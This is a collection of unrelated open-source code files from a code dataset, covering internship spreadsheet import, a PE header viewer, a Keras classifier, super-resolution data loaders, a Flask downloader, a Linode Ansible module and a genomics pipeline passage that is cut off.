mdl.internship_offer.find_intership_by_id(check_internship_offer.first().id)\n else:\n internship_offer = mdl.internship_offer.InternshipOffer()\n\n internship_offer.organization = organization[0]\n internship_offer.speciality = speciality[x]\n internship_offer.title = speciality[x].name\n internship_offer.maximum_enrollments = number_place\n internship_offer.master = master_value\n internship_offer.cohort = cohort\n internship_offer.internship = internship\n internship_offer.selectable = True\n internship_offer.save()\n\n number_period = 1\n for x in range(3, len(periods) + 3):\n period_search = \"P\" + str(number_period)\n number_period += 1\n period = mdl.period.search(name__exact=period_search, cohort=cohort).first()\n check_relation = mdl.period_internship_places.PeriodInternshipPlaces.objects.filter(period=period, internship_offer=internship_offer)\n\n if len(check_relation) != 0:\n relation = mdl.period_internship_places.find_by_id(check_relation.first().id)\n else:\n relation = mdl.period_internship_places.PeriodInternshipPlaces()\n\n relation.period = period\n relation.internship_offer = internship_offer\n if row[x].value is None:\n relation.number_places = 0\n else:\n relation.number_places = int(row[x].value)\n relation.save()\n\n\n@require_http_methods(['POST'])\n@login_required\n@permission_required('internship.is_internship_manager', raise_exception=True)\ndef upload_masters_file(request, cohort_id):\n cohort = get_object_or_404(Cohort, pk=cohort_id)\n file_name = request.FILES['file']\n if file_name is not None:\n if \".xls\" not in str(file_name):\n messages.add_message(request, messages.ERROR, _('file_must_be_xls'))\n else:\n __save_xls_masters(request, file_name, request.user)\n\n return HttpResponseRedirect(reverse('internships_masters', kwargs={\n 'cohort_id': cohort.id\n }))\n\n\n@login_required\ndef __save_xls_masters(request, file_name, user):\n workbook = openpyxl.load_workbook(file_name, read_only=True)\n worksheet = workbook.active\n\n col_reference = 2\n col_firstname = 3\n col_lastname = 4\n col_mail = 7\n col_organization_reference = 6\n col_civility = 0\n col_mastery = 1\n col_speciality = 5\n\n # Iterates over the lines of the spreadsheet.\n for count, row in enumerate(worksheet.rows):\n check_reference = str(row[col_reference].value).strip(' ')\n if check_reference == \"\":\n check_reference = \"000\"\n if check_reference is None:\n check_reference = \"000\"\n\n if not _is_registration_id(check_reference):\n continue\n\n if row[col_firstname].value and 
row[col_lastname].value:\n master_check = mdl.internship_master.search(first_name=row[col_firstname].value,\n last_name=row[col_lastname].value)\n if len(master_check) == 0:\n master = mdl.internship_master.InternshipMaster()\n else:\n master = master_check[0]\n\n if row[col_organization_reference].value:\n reference = \"\"\n check_reference = row[col_organization_reference].value.strip(' ')\n if check_reference != \"\":\n if check_reference[0][0] != \"0\":\n if int(check_reference) < 10:\n reference = \"0\"+str(check_reference)\n else:\n reference = str(check_reference)\n else:\n reference = str(check_reference)\n\n organization = mdl.organization.search(reference=reference)\n master.organization = organization[0]\n else:\n master.organization = None\n if row[col_firstname].value:\n master.first_name = row[col_firstname].value\n else:\n master.first_name = \" \"\n\n if row[col_lastname].value:\n master.last_name = row[col_lastname].value\n else:\n master.last_name = \" \"\n\n if row[col_reference].value:\n master.reference = row[col_reference].value\n else:\n master.reference = \" \"\n\n if row[col_civility].value:\n master.civility = row[col_civility].value\n else:\n master.civility = \" \"\n\n if row[col_mastery].value:\n master.type_mastery = row[col_mastery].value\n else:\n master.type_mastery = \" \"\n\n if row[col_speciality].value:\n master.speciality = row[col_speciality].value\n else:\n master.speciality = \" \"\n\n master.save()\n","repo_name":"surumen/student-information-system","sub_path":"internship/utils/upload_xls.py","file_name":"upload_xls.py","file_ext":"py","file_size_in_byte":13010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70034830249","text":"import PySide6.QtWidgets as QtWidgets\n\nfrom .. import helpers\nfrom .. 
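All three upload handlers in the record above share one openpyxl pattern: open the workbook read-only, take the active sheet, iterate rows, and skip any row whose reference cell is not an integer. A minimal standalone sketch of that loop (the file name and column index are hypothetical):

import openpyxl

workbook = openpyxl.load_workbook("places.xlsx", read_only=True)  # hypothetical file
worksheet = workbook.active

for count, row in enumerate(worksheet.rows):
    try:
        reference = int(row[0].value)  # column 0 must hold an integer reference
    except (TypeError, ValueError):
        continue  # headers and blank rows are skipped, as in the handlers
    # zero-pad single-digit references, mirroring the "0"+str(value) branches
    print(count, f"{reference:02d}")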
import pe_file\nfrom .components import table\n\n\nclass HeadersView(QtWidgets.QScrollArea):\n NAME = \"Headers\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Set up scroll area\n self.setWidgetResizable(True)\n self.scroll_area = QtWidgets.QWidget(self)\n self.setWidget(self.scroll_area)\n self.scroll_area.setLayout(QtWidgets.QFormLayout())\n\n # DOS Header\n self.dos_header_group = table.TableGroup(\n \"DOS Header\", fit_columns=True, headers=[\"Name\", \"Description\", \"Value\"]\n )\n self.scroll_area.layout().addWidget(self.dos_header_group)\n\n # COFF File Header\n self.file_header_group = table.TableGroup(\n \"File Header\", fit_columns=True, headers=[\"Name\", \"Value\"]\n )\n self.scroll_area.layout().addWidget(self.file_header_group)\n\n # Optional Header\n self.optional_header_group = table.TableGroup(\n \"Optional Header\", fit_columns=True, headers=[\"Name\", \"Value\"]\n )\n self.scroll_area.layout().addWidget(self.optional_header_group)\n self.dos_header_group.setFocus()\n\n def load(self, pe_obj: pe_file.PEFile):\n\n # DOS Header\n self.dos_header_group.view.setModel(\n table.TableModel(\n [\n (\"e_magic\", \"Magic number\", hex(pe_obj.pe.DOS_HEADER.e_magic)),\n (\n \"e_cblp\",\n \"Bytes on last page of file\",\n hex(pe_obj.pe.DOS_HEADER.e_cblp),\n ),\n (\"e_cp\", \"Pages in file\", hex(pe_obj.pe.DOS_HEADER.e_cp)),\n (\"e_crlc\", \"Relocations\", hex(pe_obj.pe.DOS_HEADER.e_crlc)),\n (\n \"e_cparhdr\",\n \"Size of header in paragraphs\",\n hex(pe_obj.pe.DOS_HEADER.e_cparhdr),\n ),\n (\n \"e_minalloc\",\n \"Minimum extra paragraphs needed\",\n hex(pe_obj.pe.DOS_HEADER.e_minalloc),\n ),\n (\n \"e_maxalloc\",\n \"Maximum extra paragraphs needed\",\n hex(pe_obj.pe.DOS_HEADER.e_maxalloc),\n ),\n (\n \"e_ss\",\n \"Initial (relative) SS value\",\n hex(pe_obj.pe.DOS_HEADER.e_ss),\n ),\n (\"e_sp\", \"Initial SP value\", hex(pe_obj.pe.DOS_HEADER.e_sp)),\n (\"e_csum\", \"Checksum\", hex(pe_obj.pe.DOS_HEADER.e_csum)),\n (\"e_ip\", \"Initial IP value\", hex(pe_obj.pe.DOS_HEADER.e_ip)),\n (\n \"e_cs\",\n \"Initial (relative) CS value\",\n hex(pe_obj.pe.DOS_HEADER.e_cs),\n ),\n (\n \"e_lfarlc\",\n \"File address of relocation table\",\n hex(pe_obj.pe.DOS_HEADER.e_lfarlc),\n ),\n (\"e_ovno\", \"Overlay number\", hex(pe_obj.pe.DOS_HEADER.e_ovno)),\n (\n \"e_res\",\n \"Reserved words\",\n hex(int.from_bytes(pe_obj.pe.DOS_HEADER.e_res, \"big\")),\n ),\n (\n \"e_oemid\",\n \"OEM identifier (for e_oeminfo)\",\n hex(pe_obj.pe.DOS_HEADER.e_oemid),\n ),\n (\n \"e_oeminfo\",\n \"OEM information; e_oemid specific\",\n hex(pe_obj.pe.DOS_HEADER.e_oeminfo),\n ),\n (\n \"e_res2\",\n \"Reserved words\",\n hex(int.from_bytes(pe_obj.pe.DOS_HEADER.e_res2, \"big\")),\n ),\n (\n \"e_lfanew\",\n \"File address of new exe header\",\n hex(pe_obj.pe.DOS_HEADER.e_lfanew),\n ),\n ],\n headers=[\"Name\", \"Description\", \"Value\"],\n )\n )\n\n # COFF File Header\n self.file_header_group.view.setModel(\n table.TableModel(\n [\n (\n \"Machine\",\n f\"{hex(pe_obj.pe.FILE_HEADER.Machine)} ({pe_obj.architecture()})\",\n ),\n (\"NumberOfSections\", str(pe_obj.pe.FILE_HEADER.NumberOfSections)),\n (\n \"TimeDateStamp\",\n f\"{hex(pe_obj.pe.FILE_HEADER.TimeDateStamp)} ({helpers.format_time(pe_obj.pe.FILE_HEADER.TimeDateStamp)})\",\n ),\n (\n \"PointerToSymbolTable\",\n hex(pe_obj.pe.FILE_HEADER.PointerToSymbolTable),\n ),\n (\"NumberOfSymbols\", str(pe_obj.pe.FILE_HEADER.NumberOfSymbols)),\n (\n \"SizeOfOptionalHeader\",\n hex(pe_obj.pe.FILE_HEADER.SizeOfOptionalHeader),\n ),\n (\n 
\"Characteristics\",\n f\"{hex(pe_obj.pe.FILE_HEADER.Characteristics)} ({pe_obj.characteristics_str()})\",\n ),\n ],\n headers=[\"Name\", \"Value\"],\n )\n )\n\n # Optional Header\n base_of_data = []\n try:\n base_of_data.append(\n (\"BaseOfData\", hex(pe_obj.pe.OPTIONAL_HEADER.BaseOfData))\n )\n except AttributeError:\n pass\n\n self.optional_header_group.view.setModel(\n table.TableModel(\n [\n (\n \"Magic\",\n f\"{hex(pe_obj.pe.OPTIONAL_HEADER.Magic)} ({pe_obj.pe_format()})\",\n ),\n (\n \"MajorLinkerVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorLinkerVersion),\n ),\n (\n \"MinorLinkerVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorLinkerVersion),\n ),\n (\"SizeOfCode\", hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfCode)),\n (\n \"SizeOfInitializedData\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfInitializedData),\n ),\n (\n \"SizeOfUninitializedData\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfUninitializedData),\n ),\n (\n \"AddressOfEntryPoint\",\n hex(pe_obj.pe.OPTIONAL_HEADER.AddressOfEntryPoint),\n ),\n (\"BaseOfCode\", hex(pe_obj.pe.OPTIONAL_HEADER.BaseOfCode)),\n ]\n + base_of_data\n + [\n (\"ImageBase\", hex(pe_obj.pe.OPTIONAL_HEADER.ImageBase)),\n (\n \"SectionAlignment\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SectionAlignment),\n ),\n (\"FileAlignment\", hex(pe_obj.pe.OPTIONAL_HEADER.FileAlignment)),\n (\n \"MajorOperatingSystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion),\n ),\n (\n \"MinorOperatingSystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorOperatingSystemVersion),\n ),\n (\n \"MajorImageVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorImageVersion),\n ),\n (\n \"MinorImageVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorImageVersion),\n ),\n (\n \"MajorSubsystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorSubsystemVersion),\n ),\n (\n \"MinorSubsystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorSubsystemVersion),\n ),\n (\n \"Win32VersionValue (reserved)\",\n hex(pe_obj.pe.OPTIONAL_HEADER.Reserved1),\n ),\n (\"SizeOfImage\", hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfImage)),\n (\"SizeOfHeaders\", hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfHeaders)),\n (\n \"CheckSum\",\n hex(pe_obj.pe.OPTIONAL_HEADER.CheckSum),\n ),\n (\n \"Subsystem\",\n f\"{hex(pe_obj.pe.OPTIONAL_HEADER.Subsystem)} ({pe_obj.subsystem()})\",\n ),\n (\n \"DllCharacteristics\",\n f\"{hex(pe_obj.pe.OPTIONAL_HEADER.DllCharacteristics)}, ({pe_obj.dll_characteristics_str()})\",\n ),\n (\n \"SizeOfStackReserve\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfStackReserve),\n ),\n (\n \"SizeOfStackCommit\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfStackCommit),\n ),\n (\n \"SizeOfHeapReserve\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfHeapReserve),\n ),\n (\n \"SizeOfHeapCommit\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfHeapCommit),\n ),\n (\"LoaderFlags\", hex(pe_obj.pe.OPTIONAL_HEADER.LoaderFlags)),\n (\n \"NumberOfRvaAndSizes\",\n str(pe_obj.pe.OPTIONAL_HEADER.NumberOfRvaAndSizes),\n ),\n ],\n headers=[\"Name\", \"Value\"],\n )\n )\n","repo_name":"andyjsmith/Exe-Spy","sub_path":"exespy/views/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":10525,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"45143941778","text":"def solution(s):\n s = list(s)\n a = len(s)//2\n #짝수일때\n if len(s)%2==0:\n return ''.join(s[a-1:a+1])\n #홀수일때\n else:\n return s.pop(a)\n return 0\nsolution(\"we\")\n\n\n\"\"\"\n해결방안\n 1. 입력값 문자열의 길이를 반으로 나눈다.\n 2. 
나눈 값이 짝,홀로 나뉨\n 2-1 홀일떄 pop 으로 가져온다\n 2-2 짝일때 ''.join(s[몫-1 : 몫+1])\n\n다른사람코드\n def string_middle(str):\n return str[(len(str)-1)//2 : len(str)//2 + 1]\n\n\n분석 및 느낀점\n 변수를 쓰지도 않고.. 깔끔한거같다\n\"\"\"\n\n","repo_name":"comjayoncloud/study-python","sub_path":"CodingTest/프로그래머스/코딩테스트 - 레벨1/가운데 글자 가져오기.py","file_name":"가운데 글자 가져오기.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1725951013","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.models import model_from_json\n\ndf = pd.read_csv(r'/kaggle/input/innerve-ads/ADScry.csv')\nX = df.iloc[:, 0:19].values\ny = df.iloc[:, 20]\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\nclassifier = Sequential()\nclassifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=19))\nclassifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\nclassifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\ny_pred = classifier.predict(X_test)\n\ny_p = []\n\nfor index, item in enumerate(y_pred):\n if item >= 0.5:\n y_p.append(1)\n else:\n y_p.append(0)\n\ny_t=y_test.tolist()\n\ncount = 0\nfor i in range(634):\n if y_p[i] == y_t[i]:\n count = count+1\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_t, y_p)\nprint(cm)","repo_name":"grlwholifts/early-autism-detection","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17243635650","text":"from fileinput import filename\nimport cv2\nfrom torch.utils import data\nimport os\nimport imageio\nimport matplotlib.pyplot as plt\nclass TrainDataset(data.Dataset):\n def __init__(self,cfg,transforms):\n super(TrainDataset,self).__init__()\n self.cfg=cfg\n train_path=cfg.train_data_dir\n hr_path=os.path.join(train_path,\"HR\")\n lr_path=os.path.join(train_path,\"LR_bicubic_X\"+cfg.scale)\n self.hr=[]\n self.lr=[]\n self.filename=[]\n lr_list=os.listdir(lr_path)\n for file in os.listdir(hr_path):\n filename,tail=os.path.splitext(file)\n lr_filename=filename+\"x\"+cfg.scale+tail\n if lr_filename in lr_list:\n self.hr.append(os.path.join(hr_path,file))\n self.lr.append(os.path.join(lr_path,lr_filename))\n self.filename.append(filename)\n tmp_hr=self.hr[:]\n tmp_lr=self.lr[:]\n tmp_filename=self.filename[:]\n for _ in range(cfg.repeat-1):\n self.hr+=tmp_hr\n for _ in range(cfg.repeat-1):\n self.lr+=tmp_lr\n for _ in range(cfg.repeat-1):\n self.filename+=tmp_filename\n self.transform=transforms\n def __getitem__(self, index):\n hr_file_path=self.hr[index]\n hr_file_path=hr_file_path.replace(\"\\\\\",'/')\n lr_file_path=self.lr[index]\n lr_file_path=lr_file_path.replace(\"\\\\\",'/')\n filename=self.filename[index]\n hr = imageio.imread(hr_file_path)\n lr = imageio.imread(lr_file_path)\n if self.transform:\n lr,hr=self.transform.data_transform[\"train\"](lr,hr)\n return lr,hr,filename\n def 
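The study note in the record above ends with a one-line alternative for taking the middle character(s) of a string. A quick check of that slice on odd- and even-length inputs:

def string_middle(s):
    # one slice covers both cases: one char for odd lengths, two for even
    return s[(len(s) - 1) // 2 : len(s) // 2 + 1]

print(string_middle("abcde"))  # "c"  (odd length)
print(string_middle("qwer"))   # "we" (even length)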
__len__(self):\n return len(self.hr)\nclass ValidDataset(data.Dataset):\n def __init__(self,cfg,transforms):\n super(ValidDataset,self).__init__()\n val_path=os.path.join(cfg.val_data_dir,\"image_SRF_\"+cfg.scale)\n self.hr=[]\n self.lr=[]\n self.filename=[]\n img_tail=\".png\"\n file_list=os.listdir(val_path)\n for file in file_list:\n tmp_sign=\"_SRF_\"+cfg.scale+\"_\"\n filename,tail=file.split(tmp_sign)\n hr_filename=filename+tmp_sign+\"HR\"+img_tail\n lr_filename=filename+tmp_sign+\"LR\"+img_tail\n if lr_filename in file_list and hr_filename in file_list:\n self.hr.append(os.path.join(val_path,hr_filename))\n self.lr.append(os.path.join(val_path,lr_filename))\n self.filename.append(filename)\n self.transform=transforms\n def __getitem__(self, index):\n hr_file_path=self.hr[index]\n hr_file_path=hr_file_path.replace(\"\\\\\",'/')\n lr_file_path=self.lr[index]\n lr_file_path=lr_file_path.replace(\"\\\\\",'/')\n filename=self.filename[index]\n hr = imageio.imread(hr_file_path)\n lr = imageio.imread(lr_file_path)\n # hr = imageio.imread(hr_file_path).convert(\"RGB\")\n # lr = imageio.imread(lr_file_path).convert(\"RGB\")\n if self.transform:\n lr,hr=self.transform.data_transform[\"val\"](lr,hr)\n return lr,hr,filename\n def __len__(self):\n return len(self.hr)\nclass TestDataset(data.Dataset):\n def __init__(self,cfg,transforms):\n super(TestDataset,self).__init__()\n lr_test_path=os.path.join(cfg.test_data_dir,\"LRbicx\"+cfg.scale)\n hr_test_path=os.path.join(cfg.test_data_dir,\"original\")\n self.hr=[]\n self.lr=[]\n self.filename=[]\n img_tail=\".png\"\n lr_file_list=os.listdir(lr_test_path)\n hr_file_list=os.listdir(hr_test_path)\n for file in hr_file_list:\n filename=os.path.basename(file)\n if filename in lr_file_list and filename in hr_file_list:\n self.hr.append(os.path.join(hr_test_path,filename))\n self.lr.append(os.path.join(lr_test_path,filename))\n self.filename.append(filename)\n self.transform=transforms\n def __getitem__(self, index):\n hr_file_path=self.hr[index]\n hr_file_path=hr_file_path.replace(\"\\\\\",'/')\n lr_file_path=self.lr[index]\n lr_file_path=lr_file_path.replace(\"\\\\\",'/')\n filename=self.filename[index]\n hr = imageio.imread(hr_file_path)\n lr = imageio.imread(lr_file_path)\n if self.transform:\n lr,hr=self.transform.data_transform[\"test\"](lr,hr)\n return lr,hr,filename\n def __len__(self):\n return len(self.hr)","repo_name":"mohenghui/ERBPSR","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30167732581","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom package.ytdownloader import download\n\napp = Flask(__name__, static_folder='./static')\n\n@app.route('/')\ndef index():\n result = request.args.get('result')\n return render_template('index.html', result = result)\n\n@app.route('/submit', methods=['POST'])\ndef post_submit():\n result = ''\n for i in range(0,2):\n if request.form.get('url{}'.format(i)) != '':\n result = result + download(request.form.get('url{}'.format(i))) + '|'\n print(result)\n\n return redirect(url_for('index', result = result))\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"yuanlin/PythonLearning","sub_path":"Unit08/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
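TrainDataset in the record above pairs each HR image with an LR file named '<stem>x<scale><ext>'. A small sketch of that naming convention (file names are illustrative):

import os

scale = "4"
hr_files = ["0001.png", "0002.png"]
lr_files = {"0001x4.png"}  # pretend listing of the LR_bicubic_X4 directory

for file in hr_files:
    stem, ext = os.path.splitext(file)
    lr_name = f"{stem}x{scale}{ext}"  # e.g. 0001.png -> 0001x4.png
    if lr_name in lr_files:
        print("paired:", file, "<->", lr_name)
    else:
        print("no LR counterpart for", file)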
+{"seq_id":"73719268967","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"This module allows users to retrieve information about a Linode user.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom typing import Any, List, Optional\n\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.user_info as docs\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_common import (\n LinodeModuleBase,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_docs import (\n global_authors,\n global_requirements,\n)\nfrom ansible_specdoc.objects import (\n FieldType,\n SpecDocMeta,\n SpecField,\n SpecReturnValue,\n)\nfrom linode_api4 import User\n\nspec = {\n # Disable the default values\n \"label\": SpecField(type=FieldType.string, required=False, doc_hide=True),\n \"state\": SpecField(type=FieldType.string, required=False, doc_hide=True),\n \"username\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\"The username of the user.\"],\n ),\n}\n\nSPECDOC_META = SpecDocMeta(\n description=[\"Get info about a Linode User.\"],\n requirements=global_requirements,\n author=global_authors,\n options=spec,\n examples=docs.specdoc_examples,\n return_values={\n \"user\": SpecReturnValue(\n description=\"The user info in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/account/#user-view\",\n type=FieldType.dict,\n sample=docs.result_user_samples,\n ),\n \"grants\": SpecReturnValue(\n description=\"The grants info in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/account/#users-grants-view__response-samples\",\n type=FieldType.dict,\n sample=docs.result_grants_samples,\n ),\n },\n)\n\n\nclass Module(LinodeModuleBase):\n \"\"\"Module for getting info about a Linode user\"\"\"\n\n def __init__(self) -> None:\n self.required_one_of: List[str] = []\n self.results = {\"user\": None}\n\n self.module_arg_spec = SPECDOC_META.ansible_spec\n\n super().__init__(\n module_arg_spec=self.module_arg_spec,\n required_one_of=self.required_one_of,\n )\n\n def exec_module(self, **kwargs: Any) -> Optional[dict]:\n \"\"\"Entrypoint for user info module\"\"\"\n\n user = self.client.account.users(\n User.username == self.module.params.get(\"username\")\n )\n grants = user.grants\n\n self.results[\"user\"] = user._raw_json\n self.results[\"grants\"] = grants._raw_json\n\n return self.results\n\n\ndef main() -> None:\n \"\"\"Constructs and calls the module\"\"\"\n Module()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linode/ansible_linode","sub_path":"plugins/modules/user_info.py","file_name":"user_info.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"22560143575","text":"import os\nscript_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nimport sys; sys.path.append(script_path)\nfrom basefly.basefly import Argument, Output, Command, Workflow, TopVar, TmpVar\nfrom utils.get_fastq_info import get_fastq_info\n__author__ = 'gdq'\n\n\"\"\"\n参考:https://github.com/Sentieon/sentieon-scripts/blob/master/example_pipelines/somatic/TNseq/tumor_normal.sh\n参考:https://support.sentieon.com/manual/TNseq_usage/tnseq/#\n本版本不刻意考虑是否可以正常生成wdl\n\"\"\"\n\n\ndef fastp(sample):\n cmd = Command()\n cmd.meta.name = 'fastp'\n # cmd.runtime.image = 'gudeqing/fastp:0.21.0'\n cmd.runtime.image = 'gudeqing/rnaseq_envs:1.0'\n cmd.runtime.tool = 'fastp'\n # 
you can add arguments directly via attribute access, which works because Munch objects are used instead of plain dicts\n cmd.args['read1'] = Argument(prefix='-i ', type='infile', desc='read1 fastq file')\n cmd.args['read2'] = Argument(prefix='-I ', type='infile', desc='read2 fastq file')\n cmd.args['threads'] = Argument(prefix='-w ', default=7, desc='thread number')\n cmd.args['other_args'] = Argument(prefix='', default='', desc=\"other arguments you want to use, such as '-x val'\")\n # of course, arguments can also be added dict-style\n cmd.args['out1'] = Argument(prefix='-o ', value=TmpVar(value=f'{sample}.clean.R1.fq.gz', name='~{sample}.clean.R1.fq.gz'), type='str', desc='clean read1 output fastq file')\n cmd.args['out2'] = Argument(prefix='-O ', value=TmpVar(value=f'{sample}.clean.R2.fq.gz', name='~{sample}.clean.R2.fq.gz'), type='str', desc='clean read2 output fastq file')\n cmd.args['html'] = Argument(prefix='-h ', value=TmpVar(value=f'{sample}.fastp.html', name='~{sample}.fastp.html'), type='str', desc='html report file')\n cmd.args['json'] = Argument(prefix='-j ', value=TmpVar(value=f'{sample}.fastp.json', name='~{sample}.fastp.json') , type='str', desc='json report file')\n # the outputs below were originally defined so that WDL could be generated,\n cmd.outputs['out1'] = Output(value=\"{out1}\", type='outfile') # here \"{}\" references another Argument object as input\n cmd.outputs['out2'] = Output(value=\"{out2}\")\n cmd.outputs['html'] = Output(value=\"{html}\")\n cmd.outputs['json'] = Output(value=\"{json}\")\n return cmd\n\n\ndef bwa_mem(sample, platform):\n cmd = Command()\n cmd.meta.name = 'bwa_mem'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon bwa mem -M'\n cmd.args['readgroup'] = Argument(prefix='-R ', desc='read group info', value=f'\"@RG\\\\tID:{sample}\\\\tSM:{sample}\\\\tPL:{platform}\"')\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['k'] = Argument(prefix='-K ', default=10000000)\n cmd.args['ref'] = Argument(type='infile', desc='reference fasta file')\n cmd.args['read1'] = Argument(type='infile', desc='read1 fastq file')\n cmd.args['read2'] = Argument(type='infile', desc='read2 fastq file')\n cmd.args['_x2'] = Argument(type='fix', value=' | sentieon util sort')\n cmd.args['ref2'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['out'] = Argument(prefix='-o ', desc='output bam file', value=f'{sample}.sorted.bam')\n cmd.args['t2'] = Argument(prefix='-t ', default=16, desc='number of threads to use')\n cmd.args['_x3'] = Argument(type='fix', value='--sam2bam -i -')\n cmd.outputs['out'] = Output(value=\"{out}\", type='outfile')\n return cmd\n\n\ndef get_metrics(sample):\n cmd = Command()\n cmd.meta.name = 'get_metrics'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['mq_metrics'] = Argument(prefix='--algo MeanQualityByCycle ', value=f'{sample}.mq_metrics.txt', desc='metric file of MeanQualityByCycle')\n cmd.args['qd_metrics'] = Argument(prefix='--algo QualDistribution ', 
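Given the prefixes declared in the fastp Command above, the rendered shell line would be expected to look roughly like the string below; this is a hand-written illustration of how each Argument's prefix and value compose, not output captured from the pipeline:

sample = "demo"
parts = [
    "fastp",
    "-i raw.R1.fq.gz",  # read1 (hypothetical input)
    "-I raw.R2.fq.gz",  # read2 (hypothetical input)
    "-w 7",             # threads default
    f"-o {sample}.clean.R1.fq.gz",
    f"-O {sample}.clean.R2.fq.gz",
    f"-h {sample}.fastp.html",
    f"-j {sample}.fastp.json",
]
print(" ".join(parts))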
value=f'{sample}.qd_metrics.txt', desc='metric file of QualDistribution')\n cmd.args['gc_summary'] = Argument(prefix='--algo GCBias --summary ', value=f'{sample}.gc_summary.txt', desc='summary file of GCBias')\n cmd.args['gc_metrics'] = Argument(desc='metrics file of GCBias', value=f'{sample}.gc_metrics.txt')\n cmd.args['aln_metrics'] = Argument(prefix='--algo AlignmentStat ', value=f'{sample}.aln_metrics.txt', desc='aln_metrics file of AlignmentStat')\n cmd.args['insert_metrics'] = Argument(prefix='--algo InsertSizeMetricAlgo ', value=f'{sample}.insert_metrics.txt', desc='insert_metrics file of InsertSizeMetricAlgo')\n cmd.outputs['mq_metrics'] = Output(value='{mq_metrics}')\n cmd.outputs['qd_metrics'] = Output(value='{qd_metrics}')\n cmd.outputs['gc_summary'] = Output(value='{gc_summary}')\n cmd.outputs['gc_metrics'] = Output(value='{gc_metrics}')\n cmd.outputs['aln_metrics'] = Output(value='{aln_metrics}')\n cmd.outputs['insert_metrics'] = Output(value='{insert_metrics}')\n return cmd\n\n\ndef plot_metrics(sample, method='GCBias'):\n cmd = Command()\n cmd.meta.name = f'plot{method}'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon plot'\n cmd.args['method'] = Argument(desc='method of plot', default=method)\n cmd.args['out'] = Argument(prefix='-o ', desc='plot file', value=f'{sample}.{method}.pdf')\n cmd.args['i'] = Argument(type='infile', desc='input metrics file for plot')\n cmd.outputs['out'] = Output(value='{out}')\n return cmd\n\n\ndef locus_collector(sample):\n cmd = Command()\n cmd.meta.name = 'LocusCollector'\n 